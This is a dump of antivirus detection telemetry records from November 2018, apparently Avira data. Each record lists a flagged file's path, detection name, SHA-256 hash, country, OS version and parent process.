  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:19:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:46:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152343-a3439420', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_556d4981\\AVSCAN-20181104-152326-9FA772F9\\AVSCAN-20181104-152343-A3439420', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='4682a5c1a07cdefd5b0db7496c9f21f8257c3be3ae87136287b1387d2f69e6ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:23:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:05:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_2a489c32.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_2a489c32.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='174059628.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\174059628.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/DB', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T19:41:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T21:44:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8fa5', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8fa5', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:33:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145916-7a4af588', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_20cc8639\\AVSCAN-20181104-145723-62AD7818\\AVSCAN-20181104-145916-7A4AF588', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:59:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-185640-9f428b14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a942d32\\AVSCAN-20181102-185627-9C8F9B48\\AVSCAN-20181102-185640-9F428B14', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:56:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162236-20b20cdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_67c12c65\\AVSCAN-20181102-162122-17303BEF\\AVSCAN-20181102-162236-20B20CDD', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:22:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\OUTLANDER 2014\\TOOL\\MSV\\ENV\\MSVJ\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='a98ecc5785c55fc0d35f6d5249e11e66b5a6bd8ce5f2bdae24a7e6de1c40c6ff', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='english.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\LANGUAGE\\ENGLISH\\ENGLISH.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e82b3935870df0344fbde79f0ab41a998ccb9c9cace45fd749bac407960e27e4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mcecf21.exe', filepath='C:\\NOVA PASTA\\PVECF21\\BKPROG\\MCECF21.exe', filesize=13312000, name='W32/Sality.AT.#M1.#R1'), hash='cf106efc210b072d845b628018b40e1d82a58681b2bfed3dcf933471f26501e4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:59:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134710-41137aaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-134653-3ED112D4\\AVSCAN-20181102-134710-41137AAF', filesize=372000, name='PUA/SearchProtect.#M1.#R1'), hash='ea8d0c17dc2c9e27511e765a8b16c09da059e04645aa1336304f6a8e61f43ef4', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:36:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\360\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cUsVGYelgkW+dOtC.2', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T17:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winmedia.exe', filepath='\\\\?\\C:\\WinMedia\\WinMedia.exe', filesize=7168000, name='HEUR/APC.#M1.#R1'), hash='cac01eec9e602e01d0843915af5042391e20d7627c069931c7a7774516358466', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:22:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:44:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141249-bdccd80e', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-141207-453DBE45\\AVSCAN-20181102-141249-BDCCD80E', filesize=192000, name='TR/AD.Bulta.Y.#M1.#R1'), hash='e3786ecd97f36eb1160b9eb50df42a58590d307c4b5e962bc7711bab4f8e7882', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:12:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\System32\\CastSrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:25:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\PROGRAM FILES (X86)\\Avira\\ANTIVIR DESKTOP\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='holford.exe', filepath='\\\\?\\C:\\Windows\\holford.exe', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='cb870b0ae24752c349ed24ea18b2e1e6d01df7e11dbbf51225a6eb9827fe7f55', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:57:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spwgzabc.exe', filepath='c:\\users\\X\\appdata\\roaming\\spwgzabc.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T19:55:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\redstarpoker\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\redstarpoker\\mppoker.exe', parentsize=1214712, timestamp='2018-11-02T10:32:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='faa7d76113e345e09118e381daef65a894e932874aa4d1f2a02301815ec442f8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\FAA7D76113E345E09118E381DAEF65A894E932874AA4D1F2A02301815EC442F8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='faa7d76113e345e09118e381daef65a894e932874aa4d1f2a02301815ec442f8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:11:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='printqueuecleaner.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\PrintQueueCleaner.exe", filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133027-6af6ce56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10768840\\AVSCAN-20181102-132954-66BA481E\\AVSCAN-20181102-133027-6AF6CE56', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='b4b2347e4416075fa0dd4ce8155ff2e67bc3a061b9ec6904da41423cc07d5b7b', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:30:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ip.exe', filepath='\\\\?\\E:\\العاب\\العاب جددة\\الشرطى الالى\\Ip.exe', filesize=832000, name='HEUR/APC.#M1.#R1'), hash='98745b834a3e4aa5935de1a9ff332482726d9edab97381c019eb4c7976380f1f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:29:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\udznptzrbrh\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/autorun \\\\\\/AdvanceScan', country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\AutoCare.exe', parentsize=1732880, timestamp='2018-11-02T06:09:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221551-626ddde1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221551-626DDDE1', filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a722ce6a7d0f2b11233224640490043e6b90ea11c14bb76bac2ef4efff125a23', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A722CE6A7D0F2B11233224640490043E6B90EA11C14BB76BAC2EF4EFFF125A23', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a722ce6a7d0f2b11233224640490043e6b90ea11c14bb76bac2ef4efff125a23', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:44:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate(1).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate(1).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T12:38:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131722-2e4c00c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3595c44b\\AVSCAN-20181102-131631-285D853F\\AVSCAN-20181102-131722-2E4C00C3', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c1ac1bb865024474e2d18e95a9b7dc08bd35751d872cf3042864901d04ab864b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:44:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwr_toolbars_tb_08.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_Extending\\dwr_toolbars_tb_08.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='9addbc19b6296f9310bcca3c9db0c8729958c1f0b46409718fc15e53ee0bec08', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T08:42:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\ANCIENPC\\C\\Program Files\\File Recovery\\undelete360\\unins000.exe', filesize=784000, name='W32/Sality.AT.#M1.#R1'), hash='d5ee8229a137c303b23ba143a490bb48d12f62f7f5b01c6ef269555c75f5e2c6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:DOKd3VcrO0Sn1oz+.1', country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:48:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083347-53ac889e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e3ca1d49\\AVSCAN-20181102-083309-4D010CC2\\AVSCAN-20181102-083347-53AC889E', filesize=1408000, name='W97M/Agent.4231.#M1.#R1'), hash='c1f266ea1c4eb0889ef1bb5e36c55cbce32dbe6264319f7eb6245f05cb600f5e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Program Files (x86)\\ProjectZomboid\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='a3859fe8d804bae3a3b424ec6c13cacd8ca76edf3e02140fe997929a101cde18', metadata=Row(cmdline='--engine=2 --session-id=VgU5C7sqzK1PJ3Swf0dpltzkKp6zp2LJ7WiNAf0q --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-02T18:40:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deletedoctor.exe', filepath='H:\\HBCD\\Programs\\DELETEDOCTOR.EXE', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:15:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pes2017.exe', filepath='K:\\العاب\\كورة اصلى 3\\Pro Evolution Soccer 2017\\PES2017.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='ada3141bc4a7f2330f73878714c7985491449e05bc9420b08b05a0ea3d637855', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T13:00:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00297405', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297405', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:44:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237f7b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237f7b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:16:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290b9f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290b9f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:39:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T18:32:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202735-e812703c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202735-E812703C', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:27:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150403-b62bbbb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150403-B62BBBB1', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:04:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:34:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen[1].exe', filepath='/Volumes/My Passport Pro/Samart/DATA1_iMAC/Documents/Samart/WasuwatP/IT_Support/BRC1/Driver Genius Pro v8.0.0.316/Lang.rus Key/keygen/ardv_suspicious_file(s)/keygen[1].exe', filesize=128000, name='HEUR/AGEN.1028107.#M15.#R1028107'), hash='d3fc50040071f41f3e5754c1745ac786b7ebb78b83e9ed08642630666e86cee4', metadata=Row(cmdline=None, country='TH', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:02:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023aab4', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023aab4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:03:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f612da637c2f256a08b72b65265240ed835766c19da1bbb82a86e76fd8a43b53', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F612DA637C2F256A08B72B65265240ED835766C19DA1BBB82A86E76FD8A43B53', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f612da637c2f256a08b72b65265240ed835766c19da1bbb82a86e76fd8a43b53', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:48:53Z'), dt=datetime.date(2018, 11, 4)),
